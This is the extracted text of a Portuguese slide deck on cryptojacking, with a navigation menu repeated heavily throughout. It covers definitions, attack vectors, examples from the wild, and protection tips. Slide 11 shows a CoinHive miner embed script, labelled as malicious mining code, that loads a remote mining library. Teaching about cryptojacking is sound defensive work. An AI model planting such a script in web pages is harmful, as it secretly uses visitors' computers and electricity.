Cryptocurrency - O momento do inception. Em que consiste crypto-jacking/crypto-mining. Quais são as principais ameaças e técnicas utilizadas pelos hackers. "Dicas" de proteção.
1. A Nova Era do
Pedro Tavares <sirpedrotavares@gmail.com>
https://seguranca-informatica.pt
21 de março de 2018
ll Jornadas de InfoWeb
2. Agenda
● A Importância da Cibersegurança
● O que é Crypto-jacking
● Cryptocurrency - The Inception
● Tipos de Crypto-jacking
● Crypto-jacking em Páginas Web
● Crypto-jacking em Redes Wi-Fi
● Crypto-jacking “ In-the-Wild ”
● Anúncios versus Crypto-mining
● Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
3. Importância da Cibersegurança
Preocupações em 2018
● Internet of Thing (IoT)
● Mobile
● Inteligência Artificial
● Sistemas descentralizados (blockchain)
● Crypto-jacking
● (...)
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Meios e tecnologias para proteçãoCibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
4. O que é Crypto-jacking
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
5. O que é Crypto-jacking
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Crypto-jacking Crypto-mining
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
6. O que é Crypto-jacking
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Crypto-jacking acontece quando o mining é feito de forma ilegal, i.e.,
sem consentimento e conhecimento
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
7. Cryptocurrency - The Inception
[1] “Security without Identification: Transaction Systems to Make Big Brother Obsolete"
https://www.cs.ru.nl/~jhh/pub/secsem/chaum1985bigbrother.pdf
[2] Cyberpunks e outras propostas de moedas criptográficas: https://www.coindesk.com/the-rise-of-the-cypherpunks/
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
8. Cryptocurrency - The Inception
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
9. Cryptocurrency - The Inception
Criptomoedas tornaram-se uma nova tendência
● Bitcoin
● Ether
● Litecoin
● NEM
● Monero
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
10. Tipos de Crypto-jacking
● Crypto-jacking em Páginas Web
● Crypto-jacking em Redes Wi-Fi
● Crypto-jacking “in-the-wild”
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
11. Crypto-jacking em Páginas Web
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
<script src=”https://coin-hive.com/lib/coinhive.min.js“></script>
<script>
var miner = new CoinHive.Anonymous(‘YOUR_TOKEN’);//Monero ID
miner.start();
</script>
Código malicioso de mineração
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
12. Crypto-jacking em redes Wi-Fi
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
13. Crypto-jacking “ In-the-Wild “
Para todo o tipo de gostos :)
● SQL Injection
● XSS + Social Engineering
● Malware
○ Dofoil (infetou mais de 500.000 computadores Windows)
○ PyCryptoMiner - SSH (dropper instala bot para minerar criptomedas)
○ Tesla Cloud — Ciber atacantes usaram processamento na Cloud
○ Plugins CMS infetados (Browsealoud, etc.)
■ Crypto-jacking em websites (Los Angels Times, Dinheiro Vivo, CR7)
○ Software e extensões com crypto-miners (Jenkins, ApacheCouchDB,
Archive Poster - extensão Google Chrome)
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
14. Anúncios versus Crypto-mining jacking
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Motivação - Obter dinheiro fácil através da capacidade de processamento e
eletricidade de terceiros (crypto-mining => jacking
Crypto-mining jacking
Problemas:
- Pouco retorno (1k visits - 55 sec - €0.36)
- Desempenho (website, browser, PC, Internet)
- Notificação prévia + consentimento
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
15. Proteção
Ponto de vista:
Utilizador
● Opera lançou módulo nativo
● Extensão Chrome: NoCoin
● AV
● Consciencialização (estar alerta) + Ação (notificar)
Infraestrutura
● Monitorização (IDS, WAFs, etc)
● Cibersegurança contínua
● Auditorias de segurança
● Consciencialização + Ação
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
16. ~ «O meu grande bem-haja a todos» ~
Pedro Tavares <sirpedrotavares@gmail.com>